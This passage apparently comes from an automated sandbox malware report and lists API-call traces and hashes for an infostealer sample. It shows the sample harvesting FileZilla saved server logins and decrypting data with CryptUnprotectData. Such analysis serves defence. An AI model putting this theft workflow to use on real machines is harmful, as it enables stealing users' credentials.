                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 00B2E709
                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 00B2E759
                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 00B2E76F
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2EE46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 433455689-0
                                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                  • Instruction ID: fd4b57cea001f9d26ad720aba9dca141c0dc311421696dda985266b3a6a11523
                                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                  • Instruction Fuzzy Hash: DB1211729102146BCB18FB60DD96EED73B9AF55700F7041EDB54A62091EE345F88CF52
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,00B253EB,40000001,00000000,00000000,?,00B253EB), ref: 00B39127
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: b221af2896fa5f7200e6f61984041ff5985cb7d46c535ca4488acfaa34af27ca
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: 6B11EC74204605BFDB00CF94DC89FA733EAEF89754F209598F909AB250D7B5E842DBA0
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D56
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00B25155,00000000,?), ref: 00B29D68
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D91
                                                  • LocalFree.KERNEL32(?,?,?,?,00B25155,00000000,?), ref: 00B29DA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID:
                                                  • API String ID: 4291131564-0
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: c681dda3f515b9250e790341f7a69bcf7aacaf2e0bd8ebed254078c79965a030
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 0011A4B4240208FFEB10CFA4DC95FAA77B5EB89704F208058FD199B394C776A901CB90
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B29DEB
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B29E0A
                                                  • memcpy.MSVCRT(?,?,?), ref: 00B29E2D
                                                  • LocalFree.KERNEL32(?), ref: 00B29E3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: c6aa5fe04d0ce49e13905ab4aeb9c488d8ffbf09fd3bfef5da70ab552c9985ea
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 0E11FAB8A00209EFDB04DFA4D985AAE77F5FF89300F104558E91997350D730AE10CF61
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0086A638,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0086A638,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0086A638,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                  • wsprintfA.USER32 ref: 00417AB7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 362916592-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                  APIs
                                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID:
                                                  • API String ID: 123533781-0
                                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 2631479d2f50d2b031f6143aaf9cd9a25f234a077c90343219cf25e52003aae1
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: F1318EB6911619CFDB10DF99D880AADBBF5FF08324F14408AD845A7312D771EA85CFA4
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 00B3D156
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_83b000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: c1dd8d0425c66180cff5b0b687fadb8707237b6ef633d4d551de6f3fa006d051
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: 091130B2340104AFDB54DE55DC91FA673EAFB89320B298055EE08CB356D775EC41C7A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 6fc5d0ac21f063d9fd3eb8d3d2893671d84bfc10e46384d9e2622194eeeb2f6c
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: 7501F776A116108FDF21EF60E804BAA33F5EB85305F0544F4D90E97242E370A8418B80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction ID: 9a3998a0e24f1c0077f2698e71d2faf349180f842f74fef1c46c5aaa869584de
                                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction Fuzzy Hash: C371D4314D1B40DBD7633B31DD03E4A7AEA7F04302F314AB4B1DB28D369E2268659B52
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • strtok_s.MSVCRT ref: 0041031B
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                  • strtok_s.MSVCRT ref: 00410679
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                  • memset.MSVCRT ref: 004106DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                  • API String ID: 337689325-514892060
                                                  • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                  • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                  APIs
                                                  • lstrlen.KERNEL32(00424DA0), ref: 00B24833
                                                  • lstrlen.KERNEL32(00424E50), ref: 00B2483E
                                                  • lstrlen.KERNEL32(00424F18), ref: 00B24849
                                                  • lstrlen.KERNEL32(00424FD0), ref: 00B24854
                                                  • lstrlen.KERNEL32(00425078), ref: 00B2485F
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B2486E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B24875
                                                  • lstrlen.KERNEL32(00425120), ref: 00B24883
                                                  • lstrlen.KERNEL32(004251C8), ref: 00B2488E
                                                  • lstrlen.KERNEL32(00425270), ref: 00B24899
                                                  • lstrlen.KERNEL32(00425318), ref: 00B248A4
                                                  • lstrlen.KERNEL32(004253C0), ref: 00B248AF
                                                  • lstrlen.KERNEL32(00425468), ref: 00B248C3
                                                  • lstrlen.KERNEL32(00425510), ref: 00B248CE
                                                  • lstrlen.KERNEL32(004255B8), ref: 00B248D9
                                                  • lstrlen.KERNEL32(00425660), ref: 00B248E4
                                                  • lstrlen.KERNEL32(00425708), ref: 00B248EF
                                                  • lstrlen.KERNEL32(004257B0), ref: 00B24918
                                                  • lstrlen.KERNEL32(00425858), ref: 00B24923
                                                  • lstrlen.KERNEL32(00425920), ref: 00B2492E
                                                  • lstrlen.KERNEL32(004259C8), ref: 00B24939
                                                  • lstrlen.KERNEL32(00425A70), ref: 00B24944
                                                  • strlen.MSVCRT ref: 00B24957
                                                  • lstrlen.KERNEL32(00425B18), ref: 00B2497F
                                                  • lstrlen.KERNEL32(00425BC0), ref: 00B2498A
                                                  • lstrlen.KERNEL32(00425C68), ref: 00B24995
                                                  • lstrlen.KERNEL32(00425D10), ref: 00B249A0
                                                  • lstrlen.KERNEL32(00425DB8), ref: 00B249AB
                                                  • lstrlen.KERNEL32(00425E60), ref: 00B249BB
                                                  • lstrlen.KERNEL32(00425F08), ref: 00B249C6
                                                  • lstrlen.KERNEL32(00425FB0), ref: 00B249D1
                                                  • lstrlen.KERNEL32(00426058), ref: 00B249DC
                                                  • lstrlen.KERNEL32(00426100), ref: 00B249E7
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B24A03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID:
                                                  • API String ID: 2127927946-0
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: b6861695466288aec7f46d2f7e45e84b80412f1a0f0f77139afe7b0e0b410156
